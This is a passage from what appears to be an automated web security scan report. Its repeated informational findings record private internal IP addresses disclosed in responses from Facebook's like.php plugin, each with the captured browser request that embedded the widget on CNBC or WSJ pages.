GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df385e130c4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3677b9138%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.864. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.192.60

Request

GET /plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3727f23f4%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1317e5bb4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Fvideo%2Fhow-to-include-your-pet-in-your-wedding-party%2F8DE80DF5-6EA8-4B36-B310-BCA4427CCA14.html&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.865. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.28.121

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df752e1b1c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb507f9ac%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.866. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.251.62

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa6e51a98%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f74f00e4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.867. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.125.53

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df14e6879a%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17b9d8228%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.868. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.244.38

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df15d47b8d4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff14a87b2b8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.869. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.129.122

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31f6560a%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3fbe1cebc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.870. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.24.51

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17499c92c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff96bb174%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.871. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.196.50

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df34a75172c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbad24028%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.872. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.223.111

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1850dd0e4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff15c9a2904%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.873. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.176.41

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3668299ec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffe69f3b88%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.874. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.128.41

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfbbabea74%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa0ab181%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.875. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.81.40

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df398326d08%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffef219d14%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.876. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.238.40

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df108644%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d796fb18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.877. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.243.51

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1414cf0a%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d796fb18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.878. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.168.131

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32ce464f4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3685c0bd%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.879. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.172.39

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a26fe16%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25942f924%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.880. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.107.35

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df38571b054%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a478987c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.881. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.69.62

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df102156e5c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1aa8c6f18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.882. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.36.59

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b5191e8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff356d7ba3c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
